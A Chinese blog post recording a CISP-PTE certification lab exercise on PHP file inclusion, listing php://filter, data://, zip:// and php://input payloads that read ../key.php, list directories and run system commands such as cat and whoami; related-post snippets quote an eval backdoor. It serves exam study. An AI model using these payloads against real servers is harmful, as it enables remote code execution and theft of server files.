CISP-PTE练习篇(基础题目三:文件包含)

已于 2023-01-30 16:58:02 修改
阅读量3k 收藏 8
点赞数
文章标签: php 开发语言
于 2023-01-30 16:06:12 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wojiaoqwe/article/details/128803857
版权

本文仅当作练习记录使用。

开始答题,答案在根目录下的key.php文件中。

php://filter      

可以访问本地的文件(通过指定末尾的文件,可以读取经base64编码后的文件源码,之后再base64解码一下就行)

php://filter/read=convert.base64-encode/resource=../key.php 

data://  

例如:?page=data://text/plain,<?php phpinfo();?>

           ?page=data://text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=

命令执行(php版本大于等于5.2,allow_url_include和allow_url_fopen都为on的状态)

查看当前目录下的文件
data://text/plain,<?php print_r(scandir(".")); ?>
查看当前上级目录下的文件
data://text/plain,<?php print_r(scandir("..")); ?>
查看key.php内容
data://text/plain,<?php @eval(system('cat%20../key.php')); ?>
data://text/plain,<?php system('cat%20../key.php'); ?>
查看当前用户权限
data://text/plain,<?php system(whoami) ?>

zip://              

可以访问本地压缩文件

只能传入绝对路径
要用#分隔压缩包和压缩包内的内容,并且#要用url编码%23

例如:?page=zip://E:/phpStudy/WWW/DVWA/vulnerabilities/fi/3.zip%23test.txt


php://input     

这个协议的利用方法是 将要执行的语法php代码写在post中提交,不用键与值的形式,只写代码即可。

直接访问php://filter 读取本地文件

?page=php://filter/read=convert.base64-encode/resource=../key.php  

因读取的文件经过base64加密需进行解密后得到key

Echo_200
关注
  • 0
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CISP-PTE实操练习题讲解二(新版)
lza20001103的博客
08-06 6934
CISP-PTE实操练习题讲解二(新版)
CISP试题及答案.pdf
08-17
CISP试题及答案.pdf
CISP-PTE考前实操练习
2301_79546223的博客
09-13 916
CISP-PTE考前学习练习题目,渗透测试功工程师
CISP-PTE八套真题详解(侵删)_cisp-pte 考题与答案
最新发布
2401_84264536的博客
05-16 437
文件包含的几种方式挨个尝试吧直接包含,失败绝对路径,失败目录穿越,失败远程包含,失败data协议写shell,使用蚁剑连接成功或者使用phpfilter查看源码。
cisp-pte考试复盘及常考题型总结
qq_44005305的博客
11-10 94
基础也不基础,pte的题都是偏实践的那一类,感觉也不算简单,不好好看看还真容易栽这上面,那就太可惜了。比如:DMZ区、php伪协议、谷歌命令、%00截断中对php版本的要求等等类似的。
CISP试题及复习资料.pdf
04-15
CISP考试认证题库 内容
CISP-PTE学习总结之基础练习题(三)
千寻的博客
10-20 5601
练习题目一:SQL注入 0x01 题目要求 0x02 解答过程: 0x03 解题总结: 练习题目二:文件上传突破 0x01 题目要求: 0x02 解题过程: 0x03 解题总结: 练习题目三:文件包含 0x01 题目要求 0x02 解题过程 0x03 解题总结: 练习题目四:反序列化漏洞 0x01 题目要求: 0x02 解题过程 练习题目五:失效的访问控制 0x01 题目·要求: 0x02 解题过程: 0x03 解题总结:
基础题目三:文件包含
king丶
07-31 2010
出来一个 Are you ok ? 访问view.html 查看源码 <?php @$a = $_POST['Hello']; if(isset($a)){ @preg_replace("/\[(.*)\]/e",'\\1',base64_decode('W0BldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUW3owXSkpO10=')); } ?> base64 解密出来等于 = [@eval(base64_decode($_POST[...
CISP-PTE考前练习-文件包含
千寻的博客
10-23 4415
文件包含漏洞也是一种注入型漏洞,其本质就是输入一段用户能够控制的脚本或者代码,并让服务端执行。
CISP-PTE web渗透通关攻略
DG_s1mple
12-09 1444
想考一个cisp-pte的证,最近在网上找了一下,找到一些资料,就先做了顺便把过程记录下来 这是老靶场打开页面告诉我们需要读取/tmp/360/key文件,我们把它记下来,然后点击进入答题 进入到如下界面 把sql输入的句子直接显示在页面上了,我们开始用HackerBar测试 发现输入1’)报错无法返回 输入1’)%23可以正常返回页面可以确定注入条件了,然后我们开始测试它的字段数量 发现空格被过滤了,我们使用注释来绕过/**/ 发现为4的时候页面可以正常返回,为5的时候不返回 确定字段数量为5
CISP-PTE靶场(win+centos).zip
03-13
CISP-PTE靶场搭建方法.rar文件提供了详细的步骤指导,帮助用户在本地或虚拟环境中配置和运行这些靶场。通常,这会涉及安装虚拟机软件(如VirtualBox或VMware),导入靶场镜像,配置网络设置,以及可能的系统初始化...
cisp-pte考试环境下载-原题 题库.txt
03-06
注册信息安全专业人员-渗透测试方向注册考试是为了锻炼考生实际解决网络安全问题的能力,有效提升我国网络安全防御能力,促进国家企事业单位网络安全健康发展,为发现人才,选拔优秀人才而设立的技能水平注册考试。 本考试为业内首家实操型渗透测试技术水平注册考试,考试内容从多个角度出发,将客观题与实操题两者结合,来考核考生的全面能力。通过多个得分点,充分检验考生对于最新网络安全技术的掌握程度,展现考生在真实的网络环境中发现问题和解决问题的能力。确保通过考试的考生能在实际工作中独当一面。 admin123 centos:root admin123 解压密码: PTE考试专用
cisp-pte注册渗透测试工程师详细资料及视频教程
07-16
此资源包提供了全面的学习材料,包括"CISP-PTE讲义",这是认证考试的核心学习资料,通常涵盖了网络安全的基础理论、法规政策、渗透测试技术、安全审计等内容。讲义会详细讲解各个知识点,如TCP/IP协议、操作系统安全...
【推荐】渗透测试工程师(CISP-PTE)认证培训课件资料合集(18份).zip
11-29
009-Web安全基础5 - 文件处理漏洞.pptx 010-Web安全基础6 - 访问控制漏洞.pptx 011-Web安全基础7 - 会话管理漏洞.pptx 012-Web安全基础8 - 实战练习.pptx 013-Apache服务器安全.pptx 014-IIS服务器安全.pptx 015-...
CISP-PTE培训PPT讲义.zip
09-09
CISP-PTE渗透测试工程师认证培训讲义PPT: 操作系统安全 windows操作系统安全 数据库安全 Web安全基础 HTTP协议 注入漏洞 XSS漏洞 请求伪造漏洞 文件处理漏洞 访问控制漏洞 会话管理漏洞 实战练习 中间件安全-...
CISP-PTE学习总结之基础练习题(二)
千寻的博客
10-20 7558
基础题目一:SQL注入 0x01 题目要求 0x02 解题过程 基础题目二:文件上传突破 0x01 题目要求 0x02 解题过程 基础题目三:文件包含 0x01 题目要求 0x02 解题过程 0x03 解题总结 基础题目四:代码执行漏洞 0x01 题目要求 0x02 解题过程 0x03 解题总结 基础题目五:失效的访问控制 0x01 题目要求 0x02 解题过程
题目3 文件包含(保姆级教程)【文末有惊喜】
honest_gg的博客
07-21 278
CISP-PTE-Centos:基础题目文件包含
【PTE】文件包含--dvwa,pikachu
leo788的博客
12-18 247
构造位置:http://127.0.0.1:8082/vulnerabilities/fi/?拼接一下:file:///C:\phpstudy_pro\WWW\dvwa\hackable\uploads\picshell.jpg。包含位置:http://127.0.0.1:8082/vulnerabilities/fi/?图片位置:http://127.0.0.1:8082/hackable/uploads/picshell.jpg。
渗透测试CISP-PTE文件包含
未知2066的博客
03-01 1306
文件包含漏洞(File Inclusion Vulnerability)是一种常见的Web应用程序安全漏洞。它会导致攻击者可以通过控制文件包含的输入来执行任意的代码。文件包含漏洞通常出现在Web应用程序中,当应用程序在处理用户输入时,没有正确地检查和验证用户提供的文件路径或文件名。攻击者可以利用这个漏洞,将恶意文件包含到应用程序的执行流程中,从而执行恶意代码。
CISP-PTE文件包含实操提
10-13
好的,我明白了。那么,你的问题是什么呢? 问题:你能否解释一下什么是CISP-PTE文件,以及它的作用是什么? 回答:CISP-PTE文件是指《信息安全技术 个人信息安全规范》中的“个人信息安全技术要求测试方案”文件,其中包含了一系列的实操测试题目和测试要求,用于测试个人信息安全技术人员的实际操作能力和技术水平。这些测试题目涵盖了个人信息安全技术的各个方面,包括密码学、网络安全、应用安全等等。 CISP-PTE文件的作用是为企业和组织提供一个标准化的测试方案,用于评估个人信息安全技术人员的实际操作能力和技术水平。通过参加CISP-PTE测试并获得合格证书,个人信息安全技术人员可以证明自己具备一定的实际操作能力和技术水平,从而提高自己在职场上的竞争力。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值